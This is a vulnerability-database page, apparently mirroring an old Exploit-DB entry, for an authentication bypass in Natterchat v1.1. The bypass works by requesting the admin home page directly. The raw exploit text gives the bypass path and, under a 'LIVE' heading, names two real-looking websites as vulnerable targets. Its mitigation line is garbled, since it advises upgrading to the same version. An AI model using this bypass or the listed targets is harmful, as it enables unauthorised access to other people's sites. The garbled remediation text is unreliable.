header-logo
Suggest Exploit
vendor:
Natterchat
by:
Mountassif Moad
8.5
CVSS
HIGH
Bypass Vulnerability
287
CWE
Product Name: Natterchat
Affected Version From: v1.1
Affected Version To: v1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:natterchat:natterchat:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

NATTERCHAT v1.1 Admin Home Bypass Vulnerability

NATTERCHAT v1.1 is prone to an admin home bypass vulnerability. An attacker can exploit this issue to gain access to the administrative panel without authentication. This may lead to further attacks.

Mitigation:

Upgrade to the latest version of NATTERCHAT v1.1
Source

Exploit-DB raw data:

==============================================================================
 NATTERCHAT v1.1  Admin Home Bypass Vulnerability
==============================================================================
 [»] Script  :          [ NATTERCHAT v1.1  ]
 [»] Discover:          [ Mountassif Moad  ]

===[ XPL ]===
 [»] http://localhost/[path]/admin/home.php
===[ LIVE ]===
 [»] http://www.welfarerights.net/natterchat/admin/home.asp
 [»] http://www.natterchat.co.uk/version11/admin/home.asp

# milw0rm.com [2008-11-20]

Navigation

Suggest Exploit

Services By CQR